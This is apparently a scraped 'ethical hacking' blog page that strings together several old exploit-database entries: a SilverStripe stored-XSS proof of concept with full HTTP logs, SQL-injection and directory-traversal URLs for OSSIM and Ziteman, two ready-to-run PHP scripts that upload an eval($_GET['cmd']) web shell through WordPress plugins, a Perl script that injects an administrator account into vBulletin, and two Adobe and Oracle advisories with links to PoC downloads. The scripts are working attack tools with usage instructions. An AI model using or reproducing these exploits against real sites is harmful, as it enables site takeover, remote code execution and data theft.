source: https://www.securityfocus.com/bid/62782/info
SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
SilverStripe 3.0.5 is vulnerable; other versions may also be affected.
Proof of Concept:
=================
1.1
The first persistent input validation web vulnerability can be exploited
by remote attackers with low privileged application user accounts and
low required user interaction. For demonstration or reproduce ...
PoC: Groups & Rollen (Roles) - Print
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en"><head>
<title>SilverStripe - Sicherheit</title>
<link rel="stylesheet" type="text/css"
href="/framework/css/GridField_print.css?m=1346228458">
</head>
<body onload="window.print();">
<h3>SilverStripe - Sicherheit</h3>
<table>
<thead>
<tr><th>Vorname</th><th>Nachname</th><th>E-Mail</th></tr>
</thead>
<tbody>
</tbody>
</table>
<p>
Gedruckt am 11:44pm, 22/09/2013
<br>
Gedruckt von a%20>"<iframe src="a" onload="alert("BKM")<" a%20=""
a%20<="">>"<iframe src=a onload=alert("BKM")<
</p>
</body>
</html>
</iframe></p></body></html>
POST
http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[20] Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new]
Content-Length[336]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C]
ParentID[]
ID[]
SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
action_doSave[1]
BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:20 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/;
httponly]
X-ControllerURL[admin/security/EditForm/field/Groups/item/4]
X-Pjax[CurrentForm,Breadcrumbs]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?
m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?
m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Status: 200[OK]
GET http://www.example.com/admin/security/EditForm/field/Groups/item/4
Load Flags[LOAD_BACKGROUND ]
Content Size[3966] Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=
organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:21 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=
1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[3966]
Status: 200[OK]
GET
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/
field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert
(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken
<==
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[378]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-
collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:26 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[378]
Status: 200[OK]
GET
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT
INJECTED SCRIPT CODE AS PATH!]
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/
Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload
%3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4&
SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.8.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4;
PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|
utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
cms-panel-collapsed-cms-content-tools-AssetAdmin=true;
cms-panel-collapsed-cms-content-tools-CMSMain=false;
cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
Connection[keep-alive]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:44:27 GMT]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/;
httponly]
X-Controller[SecurityAdmin]
X-Title[SilverStripe - Sicherheit]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
PoC: (Client-Side Link)
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members
?Title=a%25[PERSISTENT INJECTED SCRIPT
CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=&
Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2
C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22
currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken
Reference(s):
http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles
http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit
http://www.example.com/admin/security/EditForm/field/Roles/item/new
http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm
http://www.example.com/admin/security/EditForm/field/Groups/item/4
http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x
1.2
The secound persistent input validation web vulnerability and filter
bypass vulnerability can be exploited by remote attackers
with low privileged application user accounts with low required user
interaction. For demonstration or reproduce ...
PoC: Model Admin > Add Company > Edit Company
<span class="message validation">'>"<[PERSISTENT INJECTED SCRIPT
CODE!]>' ist kein numerischer Wert,
nur nummerische Werte sind in diesem Feld erlaubt</span>
</div>
<div id="CEO" class="field text">
<label class="left" for="Form_ItemEditForm_CEO">CEO</label>
<div class="middleColumn">
<input type="text" name="CEO" value=">"<[PERSISTENT INJECTED SCRIPT
CODE!])</script>" class="text" id="Form_ItemEditForm_CEO" />
</div>
Note: The vulnerability is located in the message validation filter
exception-handling.
--- PoC Session Request Logs ---
Status: 200[OK]
POST
http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ]
Content Size[1309]
Mime Type[text/html]
Request Headers:
Host[www.example.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Pjax[CurrentForm,Breadcrumbs]
X-Requested-With[XMLHttpRequest]
Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=]
Content-Length[560]
Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1;
__utmb=1.7.10.1379847695; __utmc=1;
__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1;
cms-panel-collapsed-cms-content-tools-CMSPagesController=true;
cms-panel-collapsed-cms-menu=false;
cms-panel-collapsed-cms-content-tools-ModelAdmin=false;
__utma=1.1551299670.1379847854.1379847854.1379847854.1;
__utmb=1.5.10.1379847854; __utmc=1;
__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
Name[Evolution+Security]
Category[TEST+PP]
Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]
<= [PERSISTENT INJECTED TEST CODES!]
CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]
RelationFieldsTestPageID[]
GridFieldTestPageHasOneID[]
SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
action_doSave[1]
BackURL
[http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F
new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F]
Response Headers:
Server[nginx]
Date[Sun, 22 Sep 2013 11:20:33 GMT]
Content-Type[text/html]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-cache, max-age=0, must-revalidate]
Pragma[no-cache]
Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/;
httponly]
X-Controller[TestModelAdmin]
X-Title[SilverStripe - Test ModelAdmin]
X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457]
X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,
/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1309]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143996
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/62790/info
Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable.
http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here%
http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%
source: https://www.securityfocus.com/bid/62825/info
The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# seo-watcher ~ Exploit
# http://indonesiancoder.com/
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>
source: https://www.securityfocus.com/bid/62876/info
The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# woopra plugins ~ Exploit
# http://indonesiancoder.com/
#
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') &&
@fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n
{$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>
source: https://www.securityfocus.com/bid/62899/info
Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
source: https://www.securityfocus.com/bid/62909/info
vBulletin is prone to a security-bypass vulnerability.
Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading
# it only requires the customer number which can be extracted through the same script source code.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
#
# ===================================================
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Trying to get customer number ... hold on!
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
print "--- Usage: perl $0 target\n\n";
exit; }
my $site = $ARGV[0];
##### Change these as needed #####
my $user = "MorXploit";
my $passwd = "m0rxpl017";
my $email = "dev%40null.com";
my $path = "/install/upgrade.php";
##################################
my $accept = "Accept: */*";
my $ct = "application/x-www-form-urlencoded";
my $port = "80";
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to get customer number ... hold on!\n";
print $sock "GET $path HTTP/1.1\n";
print $sock "Host: $site\n";
print $sock "$accept\n";
print $sock "Content-Type: $ct\n";
print $sock "Connection: Close\n\n";
my $gotcn;
while(my $cn = <$sock>) {
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
$gotcn = $1;
}
}
if (!defined $gotcn) {
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
}
else {
print "[+] Got $gotcn!\n";
}
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
a[confirmpassword]=$passwd&htmldata[email]=$email";
my $cl = length($xploit);
my $content = "Content-Length: $cl";
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to MorXploit $site ... hold on!\n";
print $sock2 "POST $path HTTP/1.1\n";
print $sock2 "Host: $site\n";
print $sock2 "$accept\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
print $sock2 "Content-Length: $cl\n";
print $sock2 "Content-Type: $ct\n";
print $sock2 "Connection: Close\n\n";
print $sock2 "$xploit\n\n";
while(my $result = <$sock2>){
if ($result =~ /Administrator account created/) {
print "[+] Admin account successfully injected!\n";
print "[+] Admin: $user\n";
print "[+] Pass: $passwd\n";
exit;
}
}
print "[-] Failed, something went wrong\n";
exit;
source: https://www.securityfocus.com/bid/62949/info
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/admincss/default.asp
#####################################################################################
Application: Acrobat Reader DC
Platforms: Windows
Versions: 15.008.20082.15957
CVE: CVE-2015-7622
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
============================
2) Report Timeline
============================
2015-08-09: Francis Provencher of COSIG found the issue;
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
2015-10-13: Adobe release a patch (APSB15-24)
#####################################################################################
============================
3) Technical details
============================
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip
###############################################################################
#####################################################################################
Application: Oracle Outside In
Platforms: Windows
Versions: 8.5.2
CVE: CVE-2015-4877
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-06-09: Francis Provencher of COSIG found the issue;
